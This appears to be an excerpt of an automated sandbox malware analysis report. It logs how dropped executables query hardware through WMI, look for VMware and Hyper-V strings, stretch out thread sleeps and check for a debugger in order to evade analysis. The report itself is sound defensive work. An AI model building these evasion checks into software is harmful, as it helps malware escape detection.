                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe TID: 5432Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe TID: 1664Thread sleep count: 1988 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe TID: 496Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe TID: 972Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe TID: 4832Thread sleep count: 4957 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe TID: 2464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-29870
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-29610
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeWindow / User API: threadDelayed 1988Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeWindow / User API: threadDelayed 4957Jump to behavior
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2575
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00865467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00865467
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00862390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00862390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeAPI call chain: ExitProcess graph end nodegraph_1-29872
                    Source: twl97yF91.exe, 00000001.00000003.320485719.0000000008003000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: twl97yF91.exe, 00000001.00000003.320485719.0000000008003000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware5A_A43U4Win32_VideoController6F86THT7VideoController120060621000000.000000-0004011.238display.infMSBDAURN_GV_MPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors4WW9WKO7
                    Source: twl97yF91.exe, 00000001.00000002.334419405.0000000007FC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00862F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00862F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0040ADB0 GetProcessHeap,HeapFree,1_2_0040ADB0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB092B mov eax, dword ptr fs:[00000030h]1_2_02CB092B
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CB0D90 mov eax, dword ptr fs:[00000030h]1_2_02CB0D90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_03050490 LdrInitializeThunk,1_2_03050490
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00866F40 SetUnhandledExceptionFilter,0_2_00866F40
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00866CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00866CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040E61C
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00416F6A
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004123F1 SetUnhandledExceptionFilter,1_2_004123F1
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CBE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02CBE883
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CBD070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02CBD070
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CC71D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_02CC71D1
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CC2658 SetUnhandledExceptionFilter,1_2_02CC2658
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_008618A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_008618A3
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: GetLocaleInfoA,1_2_00417A20
